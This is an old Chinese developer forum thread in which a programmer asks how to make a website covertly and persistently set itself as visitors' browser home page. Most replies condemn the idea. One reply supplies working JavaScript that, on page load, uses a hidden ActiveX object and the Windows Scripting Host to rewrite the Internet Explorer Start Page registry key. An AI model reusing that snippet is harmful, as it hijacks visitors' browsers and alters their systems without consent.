高分解决设为首页问题!急!!!!

zhengqiangsheng 2004-12-09 04:02:44
当进入该网页时,只要把该网页不知道不觉的设为首页,并不是将IE的工具选项的三个键屏蔽,当他把IE设为空白页时,IE就不把该页设为首页,但是当计算机重启之后,又把该页设为首页.请大家帮帮忙吧,(我们这些小程序员苦啊,老板叫做什么必需要做好啊,我也知道这样很烦,但是没办法!急,同胞们救救我吧)
...全文
127 17 打赏 收藏 转发到动态 举报
写回复
用AI写文章
17 条回复
切换为时间正序
请发表友善的回复…
发表回复
NTing 2004-12-09
  • 打赏
  • 举报
回复
我也做过类似的东西
但我留下了这样一个网址:http://**/******/******/animal/lavatory/please.asp?myname=fly
hj3793 2004-12-09
  • 打赏
  • 举报
回复
晕...我的主页也被 www.wo20.com修改了,晕死....
enjoymyself88 2004-12-09
  • 打赏
  • 举报
回复
最烦这个,如果你的网站好的话,不用强迫作为首页,也会回头常去的

不要以为设为首页了,浏览量高了,就好? 相反,信誉扫地~~~~~~~~~

这样的伎俩最好别用~~~
yezai 2004-12-09
  • 打赏
  • 举报
回复
谁给了他,谁生个孩子没有PP嘿嘿
baiyunfei 2004-12-09
  • 打赏
  • 举报
回复
这样的老板……员工……
Coyozo 2004-12-09
  • 打赏
  • 举报
回复
不行
menrock 2004-12-09
  • 打赏
  • 举报
回复
B4一下你老板再同情一下你,不过要是我的话我就不做了
underone 2004-12-09
  • 打赏
  • 举报
回复
我知道代码也不给你
  • 打赏
  • 举报
回复
BS!!!!
  • 打赏
  • 举报
回复
BS!!!!
尚和空四 2004-12-09
  • 打赏
  • 举报
回复
作人要厚道,你老板让你做
你可以选择换个公司
不要做这种程序
做出来 不显示你的能力
而能显示你人的素质问题
wwj9252003 2004-12-09
  • 打赏
  • 举报
回复
搂住俺很理解你!
chang1216 2004-12-09
  • 打赏
  • 举报
回复
没有天理了 程序员成了 什么了? 这样会让人家骂得 你们做得是不是不是什么好网站
chang1216 2004-12-09
  • 打赏
  • 举报
回复
没有天理了 程序员成了 什么了? 这样会让人家骂得 你们做得是不是不是什么好网站
19az 2004-12-09
  • 打赏
  • 举报
回复
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function set2homepage()
{
try
{
obj=document.applets[0];
obj.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); //Windows Scripting Host 的外壳对象
obj.createInstance(); //创建 wsh 的一个实例
Shell=obj.GetObject();
try{Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http:// 100000.home.sohu.com");}
catch(e){}
}
catch(e){}
}
setTimeout("set2homepage()",1); //1ms
</script>
nnjieguo 2004-12-09
  • 打赏
  • 举报
回复
這哪裏是程序員做的事情丫,這是要動別人的計算機的註冊表的丫
黑~~~~~~
flybird99 2004-12-09
  • 打赏
  • 举报
回复
我不喜欢这种欺负人的程序

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧